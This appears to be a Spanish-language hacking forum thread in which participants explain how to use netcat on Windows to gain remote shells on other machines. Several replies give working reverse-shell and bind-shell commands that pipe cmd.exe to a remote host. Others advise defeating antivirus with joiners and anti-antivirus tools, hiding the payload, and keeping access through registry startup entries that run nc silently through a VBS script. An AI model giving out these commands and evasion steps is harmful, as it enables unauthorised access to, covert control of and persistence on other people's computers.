cuando pones nc y usas el modificador -L no estás haciendo una conexión, solamente estás poniento el puerto que especifiques a la escucha. Se quedará a la escucha hasta que la otra shell ejecute la conexión con tu máquina por el puerto abierto.

En el caso podés usar simplemente "nc numero_ip 21" desde la otra shell y tenés la conexión.

No tiene porqué tardar...yo hice conexiónes a shells remotas y la conexión es casi inmediata...y eso que las hice en la "gran red"...

Amigos, ahi es donde entra en juego su creatividad como hackers . . . si el antivirus te molesta, encontrale la vuelta y burlalo...apagalo, detenelo, engañalo, rebuscatelas para cambiar el server y hacerlo indetectable...usá joiners, utilidades anti-antivirus:::. No se crean que los hackers tienen algun secreto como "apagar-antivirus" y listo... hay que leer, informarse .. y usar la materia griss (y la materia google)

(A parte eso ya se hablo)

Hey, si querés seguridad te conviene pasar la parte de comprobar password a un ejecutable para que no se pueda ver el fuente...a parte podés dejar el proceso corriendo, hacerlo persistente, usar md5...lo que quieras...Lo podés hacer en C++, o bien en C.

Lo que quería era hacer una pequeña colaboración:: Podemos entablar un chat con un equipo que no tenga netcat así::

En nuestro equipo ponemos "nc -vv -l -p 5000" (por ejemplo)... y en el otro vamos vía telnet poniendo "telnet nuestra_ip_o_dns" o sea que puede ser, en mi caso, "telnet darioweb.noip.org"... así podemos chatear via consola con amigos que no tengan netcat...y también podemos mantener una parte de nuestro "paquete" invisible a los antivirus mientras nos informamos acerca de la ip y otros datos que nos interesen para hacer un nuevo intento más adelante . . .

OTRO:
Podemos no desear que nuestra ip o dns esté grabado en la máquina del otro...en ese caso le dejamos un nc.exe pero lo ponemos a la escucha (en algún puerto bien raro, que puede ser elegido al azar, y descubierto con un escaneo de puertos)...
El nc a la escucha también puede ejecutar un comando al recibir conexión, con lo que:::.

nc -l -e cmd.exe -p 38000

sería un ejemplo...y nosotros conectaríamos simplemente con ejecutar "nc host_rmoto 38000"...(y añadir -vv si hay problemas)

Buen truco no?? el tema es que cualquiera puede conectarse a la máquina con sólo hacer un rápido escaneo de puertos...y en poco tiempo llega a escanear un montón:::..

Aprendiendo a usar los comandos, como "del", o usando un Batch con algun bucle...de todas formas hacer esas gansadas es cosa de lammers, sea por lo que sea, esa actitud de pedir ayuda para joderle la vida a alguien es poco "pro" 

O sea, si queres hacer una venganza infantil anda a la casa y tirale huevos 

Si, es verdad...pero ahi entra en juego tu habilidad como hacker para ocultarselo...

NOP...precisamente c:\windows forma parte de la variable de sistema "PATH" y cuando escribis un comando en Windows se busca ese comando en cada directorio de la variable PATH y con cada extensión de la variable que creo que es PATH_EXT por lo que a menos que exista un nc.com podrás escribir solo "nc" y el sistema buscará y encontrará que te referís a "c:\windows\nc.exe".
Por eso es recomendable guardarlo ahi...o modificar PATH...

Hola, el servicio de no-ip ees simplemente un proveedor de DNS y no es "mas o menos lo mismo" usar el DNS que el IP, es "EXACTAMENTE LO MISMO". Lo que pasa es que el servidor de DNS se encarga de "divulgar por toda internet" (por así decirlo), un nombre que cada vez que se use debe ser considerado como si fuera tal IP.

Si funciona en una LAN y no en la "Gran Red" debe ser porque la conexión está pasando por un firewall, que a veces es del lado del ISP o de la otra máquina.

Uno de los problemas de que toda la red esté hecha para Windows es que herramientas muy útiles como NetCat pasan a ser una "amenaza" para todos y hasta los ISP te la pueden joder. Cheká esas cosas porque la conexión está siendo interrumpida. Hacele Ping al host al que te querés conectar (o hacete uno desde ese host), y verifica las cosas. Hurgando seguro que te topas con el problema.

Si el problema en éste caso es el router fijate cómo está configurado y si tenés los puertos que usas habilitados.

En el tema creo que ya se habló sobre eso.

eso de nc -d -e cmd.exe tu.dns 80 especifica que la conexión es por el puerto 80, para que sea por el 6000 deberías cambiarlo.

No se si puedas ponerlo así en el registro, a parte no uso windows  Pero podés poner una entrada en alguna rama de inicio que llame a un vbs que ejecute escondidito el comando del nc...o bien si no lo queres esconder pones en el registro la llamada a un batch.

Las posibilidades son muchísimas y te va a ser más provechoso "jugar" como dice yan...o sea...probá y probá! Yo hice un monton de pavadas con netcat, pero es cosa de sentarse y probar, tener un poco de imaginación y un montón de tiempo al cuete 

Bueno, feliz hacking

A ver, en el equipo remoto ponés la conexión a tu máquina con

nc -d -e cmd.exe tu.dns 80

Y en tu máquina escuchas en el ochenta very verbose así:

nc -vv -L -p 80

y nada más, ya está...Si querés que se conecte a tu máquina siempre metés en el registro una entrada a un temporizador hecho en batch o lo que quieras...el resto es imaginación, ocultas las cosas, renombras y todo eso...Leete el post así no repetimos cosas que ya se dijeron

Bye!